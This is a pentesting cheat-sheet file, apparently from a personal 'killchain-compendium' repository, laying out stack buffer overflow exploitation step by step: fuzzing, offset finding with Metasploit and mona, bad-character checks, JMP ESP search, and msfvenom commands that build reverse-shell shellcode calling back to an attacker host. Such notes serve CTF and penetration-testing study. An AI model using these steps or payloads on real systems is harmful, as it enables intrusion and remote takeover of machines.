killchain-compendium/Exploits/Binaries/Buffer Overflow.md

89 lines
2.0 KiB
Markdown
Raw Permalink Normal View History

2022-11-13 22:38:01 +01:00
# Buffer Overflow
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
# Usage
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* Fuzz & crash the binary pretty roughly via payload
```sh
python -c "print('A' * 3000)
```
## Fuzzing
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* python 3
../fuzzer.py
* python 2
../fuzzer2.py
## Measure Offset
2023-01-02 20:28:19 +01:00
### Metasploit
2022-11-13 22:38:01 +01:00
* Use as payload
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
```
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* Find content of the payload at EIP and identify exact bufferlength
```sh
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
```
2023-01-02 20:28:19 +01:00
### Gef
```sh
file <filename>
pattern create
pattern search <Pattern found in $rbx>
2022-11-13 22:38:01 +01:00
```
2023-01-02 20:28:19 +01:00
### Infinity Debugger
```sh
2022-11-13 22:38:01 +01:00
msf-pattern_offset -l <bufferlength> -q <EIP>
```
2023-01-02 20:28:19 +01:00
```sh
2022-11-13 22:38:01 +01:00
mona msfpattern -l <bufferlength>
```
* Fill offset variable in exploit `buffer_overflow.py`
../buffer_overflow.py
* Execute buffer_overflow.py, EIP should contain `BBBB`
## Find bad characters to input in the buffer
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
../bad_chars.py
* Compare stack if any bad chars block exectuion of the payload following in the next steps.
```sh
!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>
```
## Find Jump Point / RoP
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
### Example: Immunity Debugger using mona on windows machine
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
```sh
!mona modules
```
```sh
!mona jmp -r esp -m <exploitable_bin_from_modules>
```
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
## Shellcode as Payload
2023-01-02 20:28:19 +01:00
2022-11-13 22:38:01 +01:00
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
```
* Prepend NOPs as padding before shellcode